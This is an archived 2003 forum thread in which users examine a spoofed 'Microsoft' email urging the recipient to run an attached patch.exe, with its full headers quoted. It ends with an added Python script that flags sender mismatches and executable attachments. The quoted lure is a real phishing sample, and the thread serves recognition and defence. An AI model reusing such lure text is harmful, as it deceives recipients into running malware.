Another virus / trojan? haha!

  1. #1
    Forgotten Ghost RogueSpy's Avatar
    Join Date
    Aug 2001
    Location
    Cyberspace
    Posts
    783

    Another virus / trojan? haha!

    Someone must not like me. . . and they think I'm stupid. Got another one of these funny e-mails. lol This one says it's from Microsoft. Interesting return path. Damn script kiddies.


    Status: U
    Return-Path: <admin@duma.gov.ru>
    Received: from localhost ([216.12.50.133])
    by swallow (EarthLink SMTP Server) with SMTP id 1ajx5F3a33NZFkN0
    for <roguespy>; Tue, 11 Nov 2003 03:53:47 -0800 (PST)
    From: "Microsoft" <security@microsoft.com>
    To: <roguespy>
    Subject: Use this patch immediately !
    MIME-Version: 1.0
    Content-Type: multipart/mixed;boundary="xxxx"
    Message-Id: <200311110353.1ajx5F3a33NZFkN0@swallow>
    Date: Tue, 11 Nov 2003 03:53:47 -0800 (PST)

    --xxxx
    Content-Type: text/plain;
    Content-Transfer-Encoding: 7bit

    Dear friend , use this Internet Explorer patch now!
    There are dangerous virus in the Internet now!
    More than 500.000 already infected!

    --xxxx
    Content-Type: application/download
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=patch.exe

    "Never give in-never, never, never, in nothing great or small, large or petty, never give in to convictions of honor and good sense. Never yield to force; never yield to the apparently overwhelming might of the enemy!" - Winston Churchill

  2. #2
    Antionline Quitter..Srsly
    Join Date
    Aug 2001
    Posts
    457
    LOL...who seriously thinks Microsoft would start a legit email with "dear friend" :P~
    "A weak mind is like a microscope, which magnifies trifling things but cannot receive great ones." G.K. Chesterton, 19th-century English essayist and poet

  3. #3
    Forgotten Ghost RogueSpy's Avatar
    Join Date
    Aug 2001
    Location
    Cyberspace
    Posts
    783
    Skript Kiddies my friend. . . . Retarded script kiddies.

    Any idea what this one is? This is becoming a habit. . . . maybe I need a forum called "Name that Virus/Trojan" lol
    "Never give in-never, never, never, in nothing great or small, large or petty, never give in to convictions of honor and good sense. Never yield to force; never yield to the apparently overwhelming might of the enemy!" - Winston Churchill

  4. #4
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Rogue, http://support-antivirus.web.cern.ch..._6/virus_6.asp .

    Generally, the body of the email will give it away. If I'm suspicious, I just plop a line or two into Google and see what pops up. It looks more like automated worm activity than a deliberate target. I expect that the address is spoofed (email addy doesn't match source addy).
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage
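
The check described in post #4 (sender address not matching the source), applied to the headers quoted in post #1. This is an added example, not part of the original thread; the `triage` and `domain` helpers, the extension list and the placeholder attachment body are assumptions made for illustration.

```python
import email
import ipaddress
import re
from email.utils import parseaddr

# Headers and MIME layout copied from the message quoted in post #1 (trimmed);
# the attachment body is a constructed placeholder, not the original binary.
SAMPLE = """\
Return-Path: <admin@duma.gov.ru>
Received: from localhost ([216.12.50.133])
From: "Microsoft" <security@microsoft.com>
Subject: Use this patch immediately !
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary="xxxx"

--xxxx
Content-Type: text/plain;

Dear friend , use this Internet Explorer patch now!

--xxxx
Content-Type: application/download
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=patch.exe

cGxhY2Vob2xkZXI=
--xxxx--
"""

RISKY_EXT = (".exe", ".scr", ".pif", ".com", ".bat")  # assumed list

def domain(addr_header):
    return parseaddr(addr_header or "")[1].rpartition("@")[2].lower()

def triage(raw):
    msg = email.message_from_string(raw)
    findings = []
    # 1. Envelope sender (Return-Path) versus the displayed From address.
    env, frm = domain(msg["Return-Path"]), domain(msg["From"])
    if env and frm and env != frm:
        findings.append(f"envelope sender domain {env} != From domain {frm}")
    # 2. Client announced itself as localhost but connected from a routable IP.
    m = re.search(r"from\s+(\S+)\s+\(\[([\d.]+)\]\)", msg.get("Received", ""))
    if m and m.group(1) == "localhost" and not ipaddress.ip_address(m.group(2)).is_loopback:
        findings.append(f"HELO 'localhost' from non-loopback {m.group(2)}")
    # 3. Executable attachment, whatever MIME type it is labelled with.
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        if name.endswith(RISKY_EXT):
            findings.append(f"executable attachment {name} ({part.get_content_type()})")
    return findings
```

A Return-Path/From mismatch on its own is common in legitimate list and bulk mail, so it is one signal to weigh alongside the other two rather than a verdict.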
